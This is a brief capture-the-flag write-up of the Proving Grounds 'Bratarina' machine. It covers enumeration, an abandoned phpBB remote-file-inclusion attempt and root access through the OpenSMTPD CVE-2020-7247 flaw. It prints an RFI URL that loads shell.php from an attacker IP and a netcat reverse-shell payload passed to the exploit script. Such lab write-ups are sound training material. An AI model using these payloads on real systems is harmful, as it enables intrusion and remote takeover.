Bratarina
Source: Proving Grounds OS: Linux Community Rating: Intermediate
Enumeration & Reconnaissance
Autorecon revealed open ports:
SSH (22)
SMTP (25)
HTTP (80)
SMB (445)
Service Analysis
The HTTP site immediately stood out, but it was painfully slow—like click-and-wait-forever slow. I thought the machine was glitching, so I reverted it and restarted, but nothing changed. Maybe it was designed to be this way?
Found CVE-2007-3697, an RFI vulnerability in PHPBB’s
sendmsg.php
:
http://192.168.111.71/phpbb/sendmsg.php?phpbb_root_path=http://192.168.45.157/shell.php

Tried repeatedly, but the site’s sluggishness made exploitation impractical, it's probably a rabbit hole.
Gaining Initial Access
Frustrated, I shifted to SMTP. Nmap identified OpenSMTPD, and a quick CVE search revealed CVE-2020-7247, an RCE flaw.

I ran the exploit script with random commands. No response. Tried again with a different command, still nothing. On the third attempt, I tweaked the payload to get a shell back, and suddenly, my netcat listener lit up. A shell connected!
python cve.py 192.168.111.71 25 "busybox nc 192.168.45.157 22 -e sh"

Privilege Escalation
Not required, initial access provided immediate root privileges.
Lessons Learned
Persistence Pays: Multiple exploit attempts may be needed, even with valid CVEs.
SMTP Overlooked: Don’t tunnel-vision on HTTP, check all services for vulnerabilities.
Slow Sites Might be Red Flags: Sluggish responses might hint at misconfigurations or intentional hurdles.
Last updated